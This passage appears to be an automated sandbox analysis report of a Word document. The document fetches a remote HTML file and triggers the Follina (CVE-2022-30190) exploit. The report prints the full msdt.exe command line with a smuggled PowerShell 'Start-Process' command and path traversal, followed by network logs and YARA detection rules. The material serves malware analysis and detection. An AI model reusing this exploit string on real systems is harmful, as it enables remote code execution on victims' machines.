                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                  2022-08-18 00:01:59 UTC10OUTHEAD /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1
                                                                                                                                                                  Authorization: Bearer
                                                                                                                                                                  X-MS-CookieUri-Requested: t
                                                                                                                                                                  X-IDCRL_ACCEPTED: t
                                                                                                                                                                  User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                  Host: sqdocs.s3.eu-west-2.amazonaws.com
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  2022-08-18 00:01:59 UTC10INHTTP/1.1 400 Bad Request
                                                                                                                                                                  x-amz-request-id: DVY7HCV5RENAHVH8
                                                                                                                                                                  x-amz-id-2: g/KPSGiVVku+Xca8F/YxRjPHUcOieN73SfrITqvyYYysP3mG1+zuqAyuv0PlZcUcIlN9rbs3kAQ=
                                                                                                                                                                  Content-Type: application/xml
                                                                                                                                                                  Date: Thu, 18 Aug 2022 00:01:59 GMT
                                                                                                                                                                  Server: AmazonS3
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                  6192.168.2.34975252.95.148.198443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                  2022-08-18 00:01:59 UTC10OUTOPTIONS / HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Authorization: Bearer
                                                                                                                                                                  User-Agent: Microsoft Office Word 2014
                                                                                                                                                                  X-Office-Major-Version: 16
                                                                                                                                                                  X-MS-CookieUri-Requested: t
                                                                                                                                                                  X-FeatureVersion: 1
                                                                                                                                                                  X-MSGETWEBURL: t
                                                                                                                                                                  X-IDCRL_ACCEPTED: t
                                                                                                                                                                  Host: sqdocs.s3.eu-west-2.amazonaws.com
                                                                                                                                                                  2022-08-18 00:01:59 UTC10INHTTP/1.1 400 Bad Request
                                                                                                                                                                  x-amz-request-id: DVYDAKDP59Z8PVGG
                                                                                                                                                                  x-amz-id-2: EIe0HGdzKwBEML3ypybGWTNQ+cpf1ClQQUHTXbhxcnRABQ5OBUT3HJHAiONTlNqfv8VQ+yxXOeg=
                                                                                                                                                                  Content-Type: application/xml
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Date: Thu, 18 Aug 2022 00:01:59 GMT
                                                                                                                                                                  Server: AmazonS3
                                                                                                                                                                  Connection: close
                                                                                                                                                                  2022-08-18 00:01:59 UTC11INData Raw: 31 31 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 42 61 64 52 65 71 75 65 73 74 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 49 6e 73 75 66 66 69 63 69 65 6e 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 20 4f 72 69 67 69 6e 20 72 65 71 75 65 73 74 20 68 65 61 64 65 72 20 6e 65 65 64 65 64 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 52 65 71 75 65 73 74 49 64 3e 44 56 59 44 41 4b 44 50 35 39 5a 38 50 56 47 47 3c 2f 52 65 71 75 65 73 74 49 64 3e 3c 48 6f 73 74 49 64 3e 45 49 65 30 48 47 64 7a 4b 77 42 45 4d 4c 33 79 70 79 62 47 57 54 4e 51 2b 63 70 66 31 43 6c 51 51 55 48 54 58 62 68 78 63 6e 52 41 42 51 35 4f 42 55 54 33 48 4a 48 41 69 4f 4e 54
                                                                                                                                                                  Data Ascii: 11b<?xml version="1.0" encoding="UTF-8"?><Error><Code>BadRequest</Code><Message>Insufficient information. Origin request header needed.</Message><RequestId>DVYDAKDP59Z8PVGG</RequestId><HostId>EIe0HGdzKwBEML3ypybGWTNQ+cpf1ClQQUHTXbhxcnRABQ5OBUT3HJHAiONT
                                                                                                                                                                  2022-08-18 00:01:59 UTC11INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                  7192.168.2.34975352.95.148.198443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                  2022-08-18 00:02:00 UTC11OUTHEAD /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Authorization: Bearer
                                                                                                                                                                  User-Agent: Microsoft Office Word 2014
                                                                                                                                                                  X-Office-Major-Version: 16
                                                                                                                                                                  X-MS-CookieUri-Requested: t
                                                                                                                                                                  X-FeatureVersion: 1
                                                                                                                                                                  X-IDCRL_ACCEPTED: t
                                                                                                                                                                  Host: sqdocs.s3.eu-west-2.amazonaws.com
                                                                                                                                                                  2022-08-18 00:02:00 UTC11INHTTP/1.1 400 Bad Request
                                                                                                                                                                  x-amz-request-id: TT1Z4E5N21WDAFC2
                                                                                                                                                                  x-amz-id-2: Zor3MEpGnxC9gYmTOwYVz+AmopmYVikfOHvxxHtHbdqyFBCddeWrr6hmm2ojwz46N4EVPqvZFTc=
                                                                                                                                                                  Content-Type: application/xml
                                                                                                                                                                  Date: Thu, 18 Aug 2022 00:01:59 GMT
                                                                                                                                                                  Server: AmazonS3
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                  8192.168.2.34975452.95.148.198443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                  2022-08-18 00:02:00 UTC12OUTOPTIONS / HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Authorization: Bearer
                                                                                                                                                                  User-Agent: Microsoft Office Word 2014
                                                                                                                                                                  X-Office-Major-Version: 16
                                                                                                                                                                  X-MS-CookieUri-Requested: t
                                                                                                                                                                  X-FeatureVersion: 1
                                                                                                                                                                  X-MSGETWEBURL: t
                                                                                                                                                                  X-IDCRL_ACCEPTED: t
                                                                                                                                                                  Host: sqdocs.s3.eu-west-2.amazonaws.com
                                                                                                                                                                  2022-08-18 00:02:00 UTC12INHTTP/1.1 400 Bad Request
                                                                                                                                                                  x-amz-request-id: TT1N82C4P0D0A3P4
                                                                                                                                                                  x-amz-id-2: ao+D3hUOwmABsSSm8/wGU5aD9/3JSnnmdm3IVV7aJaQuNPlvwm+pTqB9lbLa72I5K4lPvGdjtKw=
                                                                                                                                                                  Content-Type: application/xml
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Date: Thu, 18 Aug 2022 00:01:59 GMT
                                                                                                                                                                  Server: AmazonS3
                                                                                                                                                                  Connection: close
                                                                                                                                                                  2022-08-18 00:02:00 UTC12INData Raw: 31 31 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 42 61 64 52 65 71 75 65 73 74 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 49 6e 73 75 66 66 69 63 69 65 6e 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 20 4f 72 69 67 69 6e 20 72 65 71 75 65 73 74 20 68 65 61 64 65 72 20 6e 65 65 64 65 64 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 52 65 71 75 65 73 74 49 64 3e 54 54 31 4e 38 32 43 34 50 30 44 30 41 33 50 34 3c 2f 52 65 71 75 65 73 74 49 64 3e 3c 48 6f 73 74 49 64 3e 61 6f 2b 44 33 68 55 4f 77 6d 41 42 73 53 53 6d 38 2f 77 47 55 35 61 44 39 2f 33 4a 53 6e 6e 6d 64 6d 33 49 56 56 37 61 4a 61 51 75 4e 50 6c 76 77 6d 2b 70 54 71 42 39 6c 62 4c 61
                                                                                                                                                                  Data Ascii: 11b<?xml version="1.0" encoding="UTF-8"?><Error><Code>BadRequest</Code><Message>Insufficient information. Origin request header needed.</Message><RequestId>TT1N82C4P0D0A3P4</RequestId><HostId>ao+D3hUOwmABsSSm8/wGU5aD9/3JSnnmdm3IVV7aJaQuNPlvwm+pTqB9lbLa
                                                                                                                                                                  2022-08-18 00:02:00 UTC12INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                  9192.168.2.34975552.95.143.42443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                  2022-08-18 00:02:00 UTC12OUTGET /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                  Host: sqdocs.s3.eu-west-2.amazonaws.com
                                                                                                                                                                  If-Modified-Since: Sat, 28 May 2022 14:15:08 GMT
                                                                                                                                                                  If-None-Match: "bfbfa8fdda62476690c9077946372eaa"
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  2022-08-18 00:02:00 UTC13INHTTP/1.1 304 Not Modified
                                                                                                                                                                  x-amz-id-2: 4nyJpwpshGYJkfa/Q8R4P0obj9SVcObicHGOxWSGjArM6TL1m9oGXvYv5wPV2p+Dq1H39dRdiM0=
                                                                                                                                                                  x-amz-request-id: TT1Q1P16PR7R77W1
                                                                                                                                                                  Date: Thu, 18 Aug 2022 00:02:01 GMT
                                                                                                                                                                  Last-Modified: Sat, 28 May 2022 14:15:08 GMT
                                                                                                                                                                  ETag: "bfbfa8fdda62476690c9077946372eaa"
                                                                                                                                                                  x-amz-meta-sha256: a353db4cfd64f1876f3f99be6481189dbf5e770d71b8d03cba84ff551edbcdc6
                                                                                                                                                                  x-amz-meta-s3b-last-modified: 20220528T141455Z
                                                                                                                                                                  Server: AmazonS3
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Statistics

                                                                                                                                                                  Behavior

                                                                                                                                                                  Click to jump to process

                                                                                                                                                                  System Behavior

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:0
                                                                                                                                                                  Start time:02:01:46
                                                                                                                                                                  Start date:18/08/2022
                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                                                  Imagebase:0x120000
                                                                                                                                                                  File size:1937688 bytes
                                                                                                                                                                  MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:5
                                                                                                                                                                  Start time:02:01:55
                                                                                                                                                                  Start date:18/08/2022
                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                                                                                                                                                                  Imagebase:0xe10000
                                                                                                                                                                  File size:466688 bytes
                                                                                                                                                                  MD5 hash:EA19F4A0D18162BE3A0C8DAD249ADE8C
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:12
                                                                                                                                                                  Start time:02:02:05
                                                                                                                                                                  Start date:18/08/2022
                                                                                                                                                                  Path:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO
                                                                                                                                                                  Imagebase:0xbe0000
                                                                                                                                                                  File size:1508352 bytes
                                                                                                                                                                  MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 0000000C.00000002.568294017.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                  • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 0000000C.00000002.568294017.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 0000000C.00000002.559095546.0000000000718000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                  • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 0000000C.00000002.558367025.0000000000520000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                  • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 0000000C.00000002.558367025.0000000000520000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 0000000C.00000002.558856728.0000000000710000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                  • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 0000000C.00000002.558856728.0000000000710000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:22
                                                                                                                                                                  Start time:02:03:03
                                                                                                                                                                  Start date:18/08/2022
                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5pliokiz\5pliokiz.cmdline
                                                                                                                                                                  Imagebase:0x150000
                                                                                                                                                                  File size:2170976 bytes
                                                                                                                                                                  MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:24
                                                                                                                                                                  Start time:02:03:05
                                                                                                                                                                  Start date:18/08/2022
                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES329A.tmp" "c:\Users\user\AppData\Local\Temp\5pliokiz\CSCEC77468AE1504898A4CAD2F9B69D7F46.TMP"
                                                                                                                                                                  Imagebase:0x890000
                                                                                                                                                                  File size:43176 bytes
                                                                                                                                                                  MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:25
                                                                                                                                                                  Start time:02:03:09
                                                                                                                                                                  Start date:18/08/2022
                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\h34ip5a5\h34ip5a5.cmdline
                                                                                                                                                                  Imagebase:0x150000
                                                                                                                                                                  File size:2170976 bytes
                                                                                                                                                                  MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:28
                                                                                                                                                                  Start time:02:03:11
                                                                                                                                                                  Start date:18/08/2022
                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES48B3.tmp" "c:\Users\user\AppData\Local\Temp\h34ip5a5\CSC3AC1B580675E4658855F5C63BDA7A47F.TMP"
                                                                                                                                                                  Imagebase:0x890000
                                                                                                                                                                  File size:43176 bytes
                                                                                                                                                                  MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:30
                                                                                                                                                                  Start time:02:03:48
                                                                                                                                                                  Start date:18/08/2022
                                                                                                                                                                  Path:C:\Windows\SysWOW64\calc.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Windows\system32\calc.exe"
                                                                                                                                                                  Imagebase:0x390000
                                                                                                                                                                  File size:26112 bytes
                                                                                                                                                                  MD5 hash:0975EE4BD09E87C94861F69E4AA44B7A
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:32
                                                                                                                                                                  Start time:02:03:49
                                                                                                                                                                  Start date:18/08/2022
                                                                                                                                                                  Path:C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca
                                                                                                                                                                  Imagebase:0x7ff7a38a0000
                                                                                                                                                                  File size:4369920 bytes
                                                                                                                                                                  MD5 hash:79DAE866D55C1BA452E1B19721F67C1F
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:33
                                                                                                                                                                  Start time:02:03:49
                                                                                                                                                                  Start date:18/08/2022
                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\v2wr4cux\v2wr4cux.cmdline
                                                                                                                                                                  Imagebase:0x150000
                                                                                                                                                                  File size:2170976 bytes
                                                                                                                                                                  MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:34
                                                                                                                                                                  Start time:02:03:54
                                                                                                                                                                  Start date:18/08/2022
                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEEE6.tmp" "c:\Users\user\AppData\Local\Temp\v2wr4cux\CSCB2D03E94AB5B4EC2978640D7F4BF95DE.TMP"
                                                                                                                                                                  Imagebase:0x890000
                                                                                                                                                                  File size:43176 bytes
                                                                                                                                                                  MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                  Disassembly

                                                                                                                                                                  No disassembly